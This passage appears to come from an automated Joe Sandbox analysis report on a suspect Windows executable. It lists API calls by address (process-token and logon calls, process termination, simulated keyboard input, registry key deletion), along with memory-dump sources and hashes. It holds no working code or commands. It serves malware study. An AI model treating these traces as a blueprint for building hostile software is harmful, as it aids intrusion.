                                                                                                                • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044886C
                                                                                                                • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Enable$Show$MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1871949834-0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                APIs
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004555AD
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                                                • String ID:
                                                                                                                • API String ID: 1640429340-0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 752480666-0
                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32(00000000), ref: 0045527A
                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 0045528C
                                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                • String ID:
                                                                                                                • API String ID: 3275902921-0
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(0000000A,?,?,?,?,?,00446540,?,?,?,?,?,?,?,?,?), ref: 0043935D
                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439364
                                                                                                                • CreateEnvironmentBlock.USERENV(?,?,00000001,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439376
                                                                                                                • CloseHandle.KERNEL32(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439383
                                                                                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 004393C0
                                                                                                                • DestroyEnvironmentBlock.USERENV(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 004393D4
                                                                                                                Similarity
                                                                                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                • String ID:
                                                                                                                • API String ID: 1413079979-0
                                                                                                                APIs
                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 004555E8
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                Similarity
                                                                                                                • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                • String ID:
                                                                                                                • API String ID: 3275902921-0
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32 ref: 004554DF
                                                                                                                • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004554FA
                                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                Similarity
                                                                                                                • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3691411573-0
                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362A7
                                                                                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362B2
                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362BA
                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362C5
                                                                                                                Similarity
                                                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                • String ID:
                                                                                                                • API String ID: 2833360925-0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                  • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                  • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 0044721F
                                                                                                                • LineTo.GDI32(?,?,?), ref: 00447227
                                                                                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 00447235
                                                                                                                • LineTo.GDI32(?,?,?), ref: 0044723D
                                                                                                                • EndPath.GDI32(?), ref: 0044724E
                                                                                                                • StrokePath.GDI32(?), ref: 0044725C
                                                                                                                Similarity
                                                                                                                • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                                                • String ID:
                                                                                                                • API String ID: 372113273-0
                                                                                                                APIs
                                                                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0041098F
                                                                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410997
                                                                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004109A2
                                                                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004109AD
                                                                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 004109B5
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004109BD
                                                                                                                Similarity
                                                                                                                • API ID: Virtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4278518827-0
                                                                                                                APIs
                                                                                                                • GetDC.USER32(00000000), ref: 0044CBEF
                                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC00
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC09
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0044CC10
                                                                                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CC29
                                                                                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0044CC37
                                                                                                                Similarity
                                                                                                                • API ID: CapsDevice$Release
                                                                                                                • String ID:
                                                                                                                • API String ID: 1035833867-0
                                                                                                                APIs
                                                                                                                • InterlockedExchange.KERNEL32(0042A369,057401F8), ref: 0044B66E
                                                                                                                • EnterCriticalSection.KERNEL32(0042A321), ref: 0044B67B
                                                                                                                • TerminateThread.KERNEL32(?,000001F6), ref: 0044B689
                                                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B697
                                                                                                                  • Part of subcall function 004356CD: CloseHandle.KERNEL32(00000000,0042A365,0044B6A3,0042A365,?,000003E8,?,000001F6), ref: 004356D9
                                                                                                                • InterlockedExchange.KERNEL32(0042A369,000001F6), ref: 0044B6AC
                                                                                                                • LeaveCriticalSection.KERNEL32(0042A321), ref: 0044B6AF
                                                                                                                Similarity
                                                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 3495660284-0
                                                                                                                APIs
                                                                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00437127
                                                                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00437140
                                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 00437150
                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00437162
                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 0043716D
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00437174
                                                                                                                Similarity
                                                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 839392675-0
                                                                                                                APIs
                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A8E80,BC000000,00431B28,C:\Users\user\Desktop\p4rsJEIb7k.exe,00000004), ref: 00436055
                                                                                                                • LockServiceDatabase.ADVAPI32(00000000), ref: 00436062
                                                                                                                • UnlockServiceDatabase.ADVAPI32(00000000), ref: 0043606D
                                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00436076
                                                                                                                • GetLastError.KERNEL32 ref: 00436081
                                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00436091
                                                                                                                Similarity
                                                                                                                • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                                                                                                                • String ID:
                                                                                                                • API String ID: 1690418490-0
                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32(00000000), ref: 00475B71
                                                                                                                • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 00475B8A
                                                                                                                • CoUninitialize.OLE32 ref: 00475D71
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: CreateInitializeInstanceUninitialize
                                                                                                                • String ID: .lnk$HH
                                                                                                                • API String ID: 948891078-3121654589
                                                                                                                APIs
                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 00448562
                                                                                                                • IsMenu.USER32(?), ref: 0044857B
                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 004485D0
                                                                                                                • DrawMenuBar.USER32 ref: 004485E4
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Item$DrawInfoInsert
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 3076010158-4108050209
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469368
                                                                                                                • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00469379
                                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 004693AB
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 3850602802-1403004172
                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00436700
                                                                                                                • GetLastError.KERNEL32 ref: 0043670F
                                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00436727
                                                                                                                  • Part of subcall function 004366BE: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000000), ref: 0043678F
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                • String ID: \
                                                                                                                • API String ID: 2267087916-2967466578
                                                                                                                APIs
                                                                                                                • GetStdHandle.KERNEL32(?), ref: 004439B4
                                                                                                                  • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,77022EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                                                                  • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                                                  • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: CurrentHandleProcess$Duplicate
                                                                                                                • String ID: nul
                                                                                                                • API String ID: 2124370227-2873401336
                                                                                                                • Opcode ID: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                                                                • Instruction ID: e5202fea31d744cc2812a948a395a4146b23d8233fafbd02014e3d546f800e0b
                                                                                                                • Opcode Fuzzy Hash: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                                                                • Instruction Fuzzy Hash: 8921A070104301ABE320DF28D886B9B77E4AF94B24F504E1EF9D4972D1E3B5DA54CBA6
                                                                                                                APIs
                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 004438B7
                                                                                                                  • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,77022EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                                                                  • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                                                  • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: CurrentHandleProcess$Duplicate
                                                                                                                • String ID: nul
                                                                                                                • API String ID: 2124370227-2873401336
                                                                                                                • Opcode ID: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                                                                • Instruction ID: 183321404fa0000a7fb955016a75d3ae5bd0bbc3c7f5d4043dd6f74a8503dfc6
                                                                                                                • Opcode Fuzzy Hash: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                                                                • Instruction Fuzzy Hash: 4E2182701002019BE210DF28DC45F9BB7E4AF54B34F204A1EF9E4962D0E7759654CB56
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00441333
                                                                                                                • LoadLibraryW.KERNEL32(?,?,?,?,0047B4D0,?,?,?,?,?,?,?,?,?,00000000), ref: 0044133A
                                                                                                                • SendMessageW.USER32(?,00000467,00000000,?), ref: 00441352
                                                                                                                • DestroyWindow.USER32(00000000,?,00000467,00000000,?,?,?,?,0047B4D0,?,?,?,?,?,?), ref: 0044135B
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                • String ID: SysAnimate32
                                                                                                                • API String ID: 3529120543-1011021900
                                                                                                                • Opcode ID: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                                                                • Instruction ID: 28effd0bdeb99d0e0a50349a2d6ccdc4655b9339127a2247ff1827a793b197f6
                                                                                                                • Opcode Fuzzy Hash: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                                                                • Instruction Fuzzy Hash: D0216271204301ABF7209AA5DC84F6B73ECEBD9724F104A1EF651D72E0D6B4DC818729
                                                                                                                APIs
                                                                                                                • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0044304E
                                                                                                                • TranslateMessage.USER32(?), ref: 0044308B
                                                                                                                • DispatchMessageW.USER32(?), ref: 00443096
                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004430AD
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: Message$Peek$DispatchTranslate
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 1795658109-438819550
                                                                                                                • Opcode ID: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                                                                • Instruction ID: a39ada88e739a490af96418dc0f35d82e94fc94c1e76e22fe960a83301852fb1
                                                                                                                • Opcode Fuzzy Hash: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                                                                • Instruction Fuzzy Hash: 9F2138715183419EF720DF289C80FA3B7949B60B05F008ABFF66492191E6B99608C76E
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D32F
                                                                                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3B3
                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D416
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$InformationVolume
                                                                                                                • String ID: %lu$HH
                                                                                                                • API String ID: 2507767853-3924996404
                                                                                                                • Opcode ID: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                                                                • Instruction ID: e4de0c6df68350460ad5232616e5185c9d799459bd1b640414cfcbd8d86849a8
                                                                                                                • Opcode Fuzzy Hash: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                                                                • Instruction Fuzzy Hash: 85314A716083019BC310EF55D941A5BB7E4FF88704F40892EFA4597292D774EA09CB9A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                                                                • Instruction ID: 66779ec6e5012556871fefb3c18d5d4f0449fb8b445ab61f685bb60241e2a5ae
                                                                                                                • Opcode Fuzzy Hash: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                                                                • Instruction Fuzzy Hash: 16C14EB2508340ABD320DF65C881EEBB7E8EFC9714F444D2FF68987241E6799544CBA6
                                                                                                                APIs
                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000001,00000000,?), ref: 00421E57
                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000000,00000000,?,-00000001,?,?,00000000,?,00415F8A,00000000,?), ref: 00421ED0
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide
                                                                                                                • String ID:
                                                                                                                • API String ID: 626452242-0
                                                                                                                • Opcode ID: 1ea55d7c848440a8403a6ff58c98b5aa76672f86defd2e698422c6d464e36b7c
                                                                                                                • Instruction ID: bd3898d71cbd482aa4aa0b4c35bbdddb761c1f54cbd41572929d464e4e701234
                                                                                                                • Opcode Fuzzy Hash: 1ea55d7c848440a8403a6ff58c98b5aa76672f86defd2e698422c6d464e36b7c
                                                                                                                • Instruction Fuzzy Hash: 1371BF71A0026ADFCF20DF94EC808BFB7B5FB65314B95052BE521A7260D7349D81CB69
                                                                                                                APIs
                                                                                                                • GetStartupInfoA.KERNEL32(?), ref: 0041B67E
                                                                                                                  • Part of subcall function 00416FFB: Sleep.KERNEL32(00000000,?,00411739,?,00401C0B), ref: 00417023
                                                                                                                • GetFileType.KERNEL32(00000040), ref: 0041B7A8
                                                                                                                • GetStdHandle.KERNEL32(-000000F6), ref: 0041B832
                                                                                                                • GetFileType.KERNEL32(00000000), ref: 0041B844
                                                                                                                • SetHandleCount.KERNEL32 ref: 0041B89C
                                                                                                                Similarity
                                                                                                                • API ID: FileHandleType$CountInfoSleepStartup
                                                                                                                • String ID:
                                                                                                                • API String ID: 1302456922-0
                                                                                                                • Opcode ID: 042631592d203edaaf3f4d78f5e16ed03b675539f236fb7f0781e26425fee0e7
                                                                                                                • Instruction ID: 78394165c801ef16868fb9e1c6e049db50f2448aaa9d77fd502763510830d482
                                                                                                                • Opcode Fuzzy Hash: 042631592d203edaaf3f4d78f5e16ed03b675539f236fb7f0781e26425fee0e7
                                                                                                                • Instruction Fuzzy Hash: 4E7124715047418FDB209B28C8847AABBF0EF46724F29465ED4A59B3E1C77CD882CB99
                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(00000000), ref: 00463DD1
                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 00463E68
                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00463E84
                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 00463ECE
                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00000000,?), ref: 00463EF0
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 2449869053-0
                                                                                                                • Opcode ID: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                                                                • Instruction ID: 5a5949aabc30296464acd143044f95cbdcafad8a77d2d24e7d672d776762960f
                                                                                                                • Opcode Fuzzy Hash: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                                                                • Instruction Fuzzy Hash: 9051C1752043409FC300EF25C881A5BB7A4FF89305F00456EF945A73A2DB79EE45CBAA
                                                                                                                APIs
                                                                                                                • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C3DA
                                                                                                                • SetKeyboardState.USER32(00000080), ref: 0044C3ED
                                                                                                                • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C441
                                                                                                                • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C465
                                                                                                                • SendInput.USER32 ref: 0044C509
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: KeyboardMessagePostState$InputSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3031425849-0
                                                                                                                • Opcode ID: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                                                                • Instruction ID: f46f63d78903415e516a46676784f6fcea1caa301ceb581e17347d916cd8316d
                                                                                                                • Opcode Fuzzy Hash: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                                                                • Instruction Fuzzy Hash: DB413B715462446FF760AB24D944BBFBB94AF99324F04061FF9D4122C2D37D9908C77A
                                                                                                                APIs
                                                                                                                • RegEnumKeyExW.ADVAPI32 ref: 004422F0
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 0044232B
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0044234E
                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00442390
                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000), ref: 004423C0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Enum$CloseDeleteOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2095303065-0
                                                                                                                • Opcode ID: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                                                                • Instruction ID: 24d8057b763805d248a02a33893b377b1579bd56aab3fff97e90bb3d062a49ad
                                                                                                                • Opcode Fuzzy Hash: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                                                                • Instruction Fuzzy Hash: 0C3150721043056EE210DF94DD84FBF73ECEBC9314F44492EBA9596141D7B8E9098B6A
                                                                                                                APIs
                                                                                                                • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C2F4
                                                                                                                • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C31B
